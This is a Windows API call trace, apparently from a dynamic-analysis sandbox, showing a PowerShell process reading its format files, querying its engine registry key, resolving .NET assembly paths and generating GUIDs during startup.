[0079.256] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ccc0 | out: lpFileInformation=0x10ccc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
[0079.259] SetErrorMode (uMode=0x1) returned 0x1
[0079.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.259] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cda8 | out: phkResult=0x10cda8*=0x30c) returned 0x0
[0079.261] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cd2c, lpData=0x0, lpcbData=0x10cd28*=0x0 | out: lpType=0x10cd2c*=0x1, lpData=0x0, lpcbData=0x10cd28*=0x56) returned 0x0
[0079.261] CoTaskMemAlloc (cb=0x5a) returned 0x19cb50
[0079.261] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ccfc, lpData=0x19cb50, lpcbData=0x10ccf8*=0x56 | out: lpType=0x10ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10ccf8*=0x56) returned 0x0
[0079.261] CoTaskMemFree (pv=0x19cb50)
[0079.262] RegCloseKey (hKey=0x30c) returned 0x0
[0079.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.343] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x5c605a6a, Data2=0xfb42, Data3=0x4d8e, Data4=([0]=0x8d, [1]=0x2f, [2]=0x32, [3]=0x46, [4]=0xab, [5]=0xc9, [6]=0x7b, [7]=0x1e))) returned 0x0
[0079.395] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x943b0316, Data2=0xa6d9, Data3=0x4cf6, Data4=([0]=0xb0, [1]=0xc3, [2]=0x90, [3]=0x90, [4]=0x49, [5]=0x1c, [6]=0x50, [7]=0x20))) returned 0x0
[0079.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.396] SetErrorMode (uMode=0x1) returned 0x1
[0079.396] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
[0079.396] GetFileType (hFile=0x30c) returned 0x1
[0079.396] SetErrorMode (uMode=0x1) returned 0x1
[0079.396] GetFileType (hFile=0x30c) returned 0x1
[0079.396] ReadFile (in: hFile=0x30c, lpBuffer=0x33070d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x33070d8*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.396] ReadFile (in: hFile=0x30c, lpBuffer=0x33070d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x33070d8*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.397] ReadFile (in: hFile=0x30c, lpBuffer=0x33070d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x33070d8*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.397] ReadFile (in: hFile=0x30c, lpBuffer=0x33070d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x33070d8*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.397] ReadFile (in: hFile=0x30c, lpBuffer=0x33070d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x33070d8*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.400] ReadFile (in: hFile=0x30c, lpBuffer=0x33070d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x33070d8*, lpNumberOfBytesRead=0x10cd18*=0xfb2, lpOverlapped=0x0) returned 1
[0079.401] ReadFile (in: hFile=0x30c, lpBuffer=0x33067f2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x33067f2*, lpNumberOfBytesRead=0x10cd18*=0x0, lpOverlapped=0x0) returned 1
[0079.401] ReadFile (in: hFile=0x30c, lpBuffer=0x33070d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x33070d8*, lpNumberOfBytesRead=0x10cd18*=0x0, lpOverlapped=0x0) returned 1
[0079.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.401] SetErrorMode (uMode=0x1) returned 0x1
[0079.401] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ccc0 | out: lpFileInformation=0x10ccc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
[0079.401] SetErrorMode (uMode=0x1) returned 0x1
[0079.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.401] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cda8 | out: phkResult=0x10cda8*=0x30c) returned 0x0
[0079.402] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cd2c, lpData=0x0, lpcbData=0x10cd28*=0x0 | out: lpType=0x10cd2c*=0x1, lpData=0x0, lpcbData=0x10cd28*=0x56) returned 0x0
[0079.402] CoTaskMemAlloc (cb=0x5a) returned 0x24d210
[0079.402] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ccfc, lpData=0x24d210, lpcbData=0x10ccf8*=0x56 | out: lpType=0x10ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10ccf8*=0x56) returned 0x0
[0079.402] CoTaskMemFree (pv=0x24d210)
[0079.402] RegCloseKey (hKey=0x30c) returned 0x0
[0079.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.403] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x308c1125, Data2=0xa696, Data3=0x43bf, Data4=([0]=0xa2, [1]=0x42, [2]=0x6c, [3]=0xbf, [4]=0x50, [5]=0xb7, [6]=0x2, [7]=0xc2))) returned 0x0
[0079.404] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x9ea95349, Data2=0x7ac1, Data3=0x46bb, Data4=([0]=0xb2, [1]=0x4c, [2]=0x6d, [3]=0x3f, [4]=0x4b, [5]=0xe6, [6]=0xdc, [7]=0x89))) returned 0x0
[0079.417] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x2c7538c1, Data2=0x9c98, Data3=0x4a1d, Data4=([0]=0xbe, [1]=0xc2, [2]=0x62, [3]=0x40, [4]=0xb4, [5]=0xb1, [6]=0x51, [7]=0xf6))) returned 0x0
[0079.418] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xeaeb1272, Data2=0x388a, Data3=0x4b2b, Data4=([0]=0x84, [1]=0x8c, [2]=0x27, [3]=0x60, [4]=0x7, [5]=0x49, [6]=0x46, [7]=0x20))) returned 0x0
[0079.418] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x9d14d40f, Data2=0x6da3, Data3=0x405c, Data4=([0]=0x9f, [1]=0x1d, [2]=0x3a, [3]=0x26, [4]=0xe8, [5]=0xe4, [6]=0xbc, [7]=0x8a))) returned 0x0
[0079.418] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x960cb8a4, Data2=0x2b41, Data3=0x4497, Data4=([0]=0xb6, [1]=0x3, [2]=0x77, [3]=0x28, [4]=0x59, [5]=0xe7, [6]=0xc6, [7]=0x64))) returned 0x0
[0079.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.419] SetErrorMode (uMode=0x1) returned 0x1
[0079.419] SetErrorMode (uMode=0x1) returned 0x1
[0079.419] GetFileType (hFile=0x30c) returned 0x1
[0079.419] ReadFile (in: hFile=0x30c, lpBuffer=0x3352e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3352e38*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.431] ReadFile (in: hFile=0x30c, lpBuffer=0x3352e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3352e38*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.449] ReadFile (in: hFile=0x30c, lpBuffer=0x3352e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3352e38*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.449] ReadFile (in: hFile=0x30c, lpBuffer=0x3352e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3352e38*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.450] ReadFile (in: hFile=0x30c, lpBuffer=0x3352e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3352e38*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.450] ReadFile (in: hFile=0x30c, lpBuffer=0x3352e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3352e38*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.450] ReadFile (in: hFile=0x30c, lpBuffer=0x3352e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3352e38*, lpNumberOfBytesRead=0x10cd18*=0xaca, lpOverlapped=0x0) returned 1
[0079.450] ReadFile (in: hFile=0x30c, lpBuffer=0x335246a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x335246a*, lpNumberOfBytesRead=0x10cd18*=0x0, lpOverlapped=0x0) returned 1
[0079.450] ReadFile (in: hFile=0x30c, lpBuffer=0x3352e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3352e38*, lpNumberOfBytesRead=0x10cd18*=0x0, lpOverlapped=0x0) returned 1
[0079.450] CloseHandle (hObject=0x30c) returned 1
[0079.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.452] SetErrorMode (uMode=0x1) returned 0x1
[0079.452] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ccc0 | out: lpFileInformation=0x10ccc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
[0079.452] SetErrorMode (uMode=0x1) returned 0x1
[0079.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.452] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cda8 | out: phkResult=0x10cda8*=0x30c) returned 0x0
[0079.452] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cd2c, lpData=0x0, lpcbData=0x10cd28*=0x0 | out: lpType=0x10cd2c*=0x1, lpData=0x0, lpcbData=0x10cd28*=0x56) returned 0x0
[0079.452] CoTaskMemAlloc (cb=0x5a) returned 0x24d210
[0079.452] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ccfc, lpData=0x24d210, lpcbData=0x10ccf8*=0x56 | out: lpType=0x10ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10ccf8*=0x56) returned 0x0
[0079.452] CoTaskMemFree (pv=0x24d210)
[0079.452] RegCloseKey (hKey=0x30c) returned 0x0
[0079.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
[0079.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0079.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
[0079.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
[0079.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
[0079.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
[0079.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
[0079.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
[0079.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
[0079.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
[0079.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0079.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
[0079.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
[0079.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
[0079.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
[0079.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0079.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
[0079.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.692] VirtualQuery (in: lpAddress=0x10b840, lpBuffer=0x10c700, dwLength=0x30 | out: lpBuffer=0x10c700*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.692] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x940fdb, Data2=0xcf1a, Data3=0x42ab, Data4=([0]=0xb6, [1]=0x9d, [2]=0xb2, [3]=0xa7, [4]=0x7f, [5]=0xe2, [6]=0x9f, [7]=0x56))) returned 0x0
[0079.693] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x4ac6f133, Data2=0xf744, Data3=0x4b32, Data4=([0]=0x85, [1]=0xa2, [2]=0xd4, [3]=0xda, [4]=0xda, [5]=0x10, [6]=0x3b, [7]=0xff))) returned 0x0
